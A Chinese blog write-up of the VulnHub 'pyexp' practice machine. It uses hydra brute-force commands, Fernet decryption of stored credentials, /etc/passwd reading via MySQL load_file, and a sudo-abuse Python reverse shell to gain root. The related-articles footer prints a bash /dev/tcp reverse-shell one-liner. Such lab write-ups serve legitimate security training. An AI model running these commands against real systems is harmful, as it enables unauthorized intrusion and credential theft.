pyexp靶机总结

最新推荐文章于 2024-05-13 20:50:44 发布
最新推荐文章于 2024-05-13 20:50:44 发布
阅读量569 收藏
点赞数
分类专栏: 靶机测试 文章标签: mysql 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45301512/article/details/128605235
版权

pyexp靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/pyexp/pyexpvm.zip

  1. 打开靶机.使用nmap扫描出靶机的ip和开放的端口
    可以看到,靶机开放了1337端口和3306端口
    1337端口是ssh的端口,3306是mysql数据库的端口在这里插入图片描述

  2. 根据之前做靶机的经验来看,一般是开放80端口,然后根据网站去找到合适的方法getshell,但是这里没有开放80端口,因此只能考虑1337端口和3306端口
    那么先对这两个端口进行爆破一波,看是否能爆破出登录的密码

    由于不知道存在什么用户,因此只能先尝试root用户的爆破

    mysql的3306端口爆破成功,得到root账户的密码prettywoman

    hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.11.135

    在这里插入图片描述
    ssh的1337端口爆破失败

    hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.11.135 ssh

    在这里插入图片描述

  3. 利用密码成功远程登录mysql在这里插入图片描述

  4. 本来刚开始我在考虑是否可以使用mysql提权
    这里只能考虑使用udf提权,其它的mysql提权都不太合适
    在这里插入图片描述
    在这里插入图片描述
    但是写入文件失败,这里权限是只读在这里插入图片描述

  5. 既然无法mysql提权,那么就查看mysql里面是否有可用信息
    发现data数据库下面fernet表存在有用的信息在这里插入图片描述
    这里网上百度了下,fernet是python的一种对称加解密的算法,类似于AES
    百度出一个给出使用方法的网址
    https://cryptography.io/en/latest/fernet/在这里插入图片描述
    先运行以下例子看看

    from cryptography.fernet import Fernet
key = Fernet.generate_key()
f = Fernet(key)
token = f.encrypt(b"my deep dark secret")
token
b'...'
f.decrypt(token)
b'my deep dark secret'

    这里python的得先安装cryptography库
    pip install cryptography
    如果没有这个库,会报错,就像下面这个图一样在这里插入图片描述
    在这里插入图片描述

    大致看懂这个算法的使用了
    (1) 需要先导入Fernet的库 , from cryptography.fernet import Fernet
    (2) 然后给出一个key,它这里key是用的fernet生成的一般的key, key = Fernet.generate_key(),并且把key给了f变量
    (3) 加密的时候需要用的这个key,f.encrypt(b"my deep dark secret") 就是加密的,里面的my deep dark secret是加密的东西,并且加密后赋值给了变量token
    (4) 当输入token的时候,就可以看到加密后的值
    (5) 加密是使用f.decrypt(token),就会给出要加密的东西,并且格式是b’要加密的内容’

    根据例子,我们可以仿照来写出我们这个题的解码的python代码

    from cryptography.fernet import Fernet
key = 'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
f = Fernet(key)
f.decrypt(b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=')

    成功获得加密的东西

    b'lucy:wJ9`"Lemdv9[FEw-'

    去掉固定的格式b’’

    lucy:wJ9`"Lemdv9[FEw-

    获得带这个东西,这个看起来像是密码在这里插入图片描述

  6. 我们利用mysql查看是否存在lucy
    使用load_file函数读取文件
    select load_file (‘/etc/passwd’);在这里插入图片描述
    发现的确是存在lucy用户可以登录的在这里插入图片描述

  7. 利用ssh的1337端口登录lucy用户
    密码是我们获得的wJ9`"Lemdv9[FEw-
    成功登录lucy用户
    在这里插入图片描述
    在lucy用户的目录下,发现第一个flag,但是以往的经验都是需要提权的,root的目录下肯定还存放着flag
    在这里插入图片描述

  8. 这里发现了sudo滥用的提权
    会以root的身份去运行exp.py脚本
    并且脚本是可以输入的,意味着这个脚本可控
    那么我们直接输入我们的反弹shell,然后运行即可

    在这里插入图片描述
    这里根据下面这个linux的反弹shell的网站,随便找一个python的反弹shell
    https://www.revshells.com/
    我这里也是随便试了一个
    在这里插入图片描述
    先开启12345端口监听在这里插入图片描述
    然后使用sudo /usr/bin/python2 /opt/exp.py 以root用户执行exp.py
    how are you?后面可以继续输入python代码,直接赋值我们反弹shell网上找的python反弹代码在这里插入图片描述
    再返回监听的12345端口的终端的时候,发现成功回弹root的shell
    提权成功,并且获得了root目录下的flag在这里插入图片描述

Beilay()
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用python编写简单的文件上传exp
CC210231的博客
04-02 2097
最近开始学习使用python进行exp的编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
vulnhub之pyexp
weixin_54431413的博客
06-26 375
主要学习了如何不从web应用突破边界,hydra暴力破解拿到mysql权限:一、进行系统层面的攻击(do_system(),load_file(),\!),二、对数据库信息的分析。python的加解密算法的应用。利用sudo 配置问题的进行提权。...
hydra常见服务爆破命令
最新发布
余十步的博客
05-13 645
hydra 也称九头蛇,是著名黑客组织thc的一款开源的暴力密码破解工具,可以破解多种密码。
vulnhub -- pyexp
weixin_46107179的博客
05-16 384
靶机下载链接:下载地址 下载完成后解压,用VMware打开 主机发现 通过arp-scan -l 来发现主机是否存活 信息收集 通过nmap扫描主机开放端口1337和3306,并没有熟悉的80端口 通过searchsploit搜索相关的漏洞利用,发现好像并不能打点成功,接下来只有进行爆破 对ssh和mysql同时进行爆破,发现mysql爆破成功,获取到密码 然后进行登录mysql,尝试执行系统命令,发现不行 尝试读取文件,发现可以通过load_file读取文件,用select load_file(‘
pyexpvm靶机打靶过程及思路
qq_52610024的博客
05-18 228
执行语句selectload_file(‘/etc/passwd’)发现一个名为lcuy的账号。5.查看mysql数据库的表与数据,表名为fernet,是一种python下的加密算法。2.没有开放web服务,但是开启了22端口的ssh服务以及mysql的3306端口。mysql-uroot-h10.1.8.128-p输入密码连接成功。尝试查看其他可以存在有效信息系统文件路径文件,查看lucy下的公钥文件也不存在。sudo-l查看到exp这个py文件存在root权限文件。...
实战打靶集锦-30-pyexpvm
阿尔泰野狼的博客
03-31 994
本文记录了博主的一次打靶经历,涉及mysql渗透,密码爆破,fernet加解密等。
vulnhub靶机实战-My-cmsms靶机
09-29
总结 本文档详细讲解了靶机实战中的一些基本技术,包括主机发现、端口扫描、服务版本识别等。掌握这些技术对于进行靶机实战和网络安全测试非常重要。本文档还讲解了一些其他的扫描技术,例如tcpdump和Wireshark等,...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
PWN靶机环境 网络安全
05-23
PWN靶机环境
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
python端口通信_Python实现TCP/IP协议下的端口转发及重定向示例
weixin_34549315的博客
02-04 1147
首先,我们用webpy写一个简单的网站,监听8080端口,返回“Hello, EverET.org”的页面。然后我们使用我们的forwarding.py,在80端口和8080端口中间建立两条通信管道用于双向通信。此时,我们通过80端口访问我们的服务器。浏览器得到:然后,我们在forwarding.py的输出结果中可以看到浏览器和webpy之间的通信内容。代码:#!/usr/bin/env pyth...
python 渗透测试基础-网络通讯
慕容卡卡
03-23 1261
本文转载自【 python 渗透测试基础-网络通讯】https://www.lzfkj.vip/post/20 文章目录python 渗透测试基础-网络通讯简述TCP实例TCP 服务端TCP 客户端运行结果TCP的另外一个客户端TCP的SSL请求客户端UDP实例UDP 服务端UDP 客户端 python 渗透测试基础-网络通讯 简述     在很多情况下,我们所在的测试环境并没有给我们提供很多有利的条件,特别是在一些审计等级高的地方,更是直接断开物理连接;除了这个方式
渗透中反弹shell与端口
千寻的博客
01-03 1818
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
python网络渗透入门_利用Python进行Web渗透测试(四):HTTP协议基础
weixin_39890543的博客
12-10 215
本篇将会涉及:什么是HTTP,以及HTTP的工作方式HTTP的方法一、什么是HTTPHTTP协议HTTP全称超文本传输协议,一个设计用来来客户端和服务器之间进行通信的协议。HTTP在网络世界中属于OSI模型的第七层——应用层,也属于TCP/IP模型的第四层——应用层。关于什么是OSI模型,什么又是TCP/IP模型,简而言之,其是计算机网络世界的一个网络体系结构,用来定义计算机网络及其各个部分通信的...
靶机渗透之Typhoon实战
weixin_52924983的博客
02-08 827
本次的Typhoon靶机包含了几个漏洞和配置错误。你们可以用这个靶机来测试网络服务漏洞,配置错误,web应用漏洞,也可以进行密码破解攻击,提权,后渗透,还可以进行信息收集和DNS攻击。 靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/ 渗透测试方法 · 网络扫描(Netdiscover和Nmap都行) · 方法一:利用MongoDB进行入侵 · 查看robots.txt · 通过浏览器利用MongoDB · 获取凭证 · SSH登录 · 查看内核版本
5 分钟掌握 Python 中常见的配置文件
skydust1979的博客
09-27 201
为什么要写配置文件 在开发过程中,我们常常会用到一些固定参数或者是常量。对于这些较为固定且常用到的部分,往往会将其写到一个固定文件中,避免在不同的模块代码中重复出现从而保持核心代码整洁。 这个固定文件我们可以直接写成一个.py文件,例如settings.py或config.py,这样的好处就是能够在同一工程下直接通过import来导入当中的部分;但如果我们需要在其他非 Python 的平台进行配置文件共享时,写成单个.py就不是一个很好的选择。这时我们就应该选择通用的配置文件类型来作为...
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1134
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
渗透靶场 Vulnhub:DC-1复现
qq_47168481的博客
09-02 623
渗透靶机DC-1复现过程 下载完靶机后,设置为NAT模式,即可开始测试。 相关过程: 信息搜集 msf的漏洞探测 msf的漏洞利用 提权 信息搜集 1.首先利用nmap探测目标机位置: nmap -A 192.168.178.100/24 获知: 靶机ip地址:192.168.178.141 获取靶机指纹相关信息: 获知: 靶机使用的cms是Drupal 7 漏洞探测: 方法一:利用nmap的脚本探测出漏洞的CVE编号,在msf中查找相关漏洞 方法二:使用msf直接查找网站站点cms漏洞加以利用 方
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值